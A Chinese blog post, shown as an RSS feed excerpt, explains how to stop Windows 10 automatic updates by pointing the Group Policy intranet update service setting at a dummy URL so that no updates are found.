Windows 10 禁止自动更新最简单巧妙的方法 https://ihacksoft.com/archive/1432.html https://ihacksoft.com/archive/1432.html#respond Sun, 06 Feb 2022 07:41:29 +0000 https://ihacksoft.com/?p=2170   无意间网上看到的方法,思路非常巧妙,在此分享。Windows 10 的更新很难关掉(Windows 11 估计也一样),但是我们可以转换思路,让系统获取不到更新,你只要给设备指定一个更新获取网址,这样子系统就搜索不到有用的更新了。具体方法如下:
开始-运行(快捷键 Win+R),输入gpedit.msc,打开组策略,在“计算机配置--管理模板--Windows 组件--Windows 更新”里找到“指定 Intranet microsoft 更新服务位置”,双击打开,启用,随便输一个网址,比如ihacksoft.com,3个框都填上,点确定,如下图:

Windows 10 禁止自动更新

  最后重启系统,打开 Windows Update 查看,显示:无可用更新,自然就不会自动更新了。

Windows 10 禁止自动更新

]]>
https://ihacksoft.com/archive/1432.html/feed 0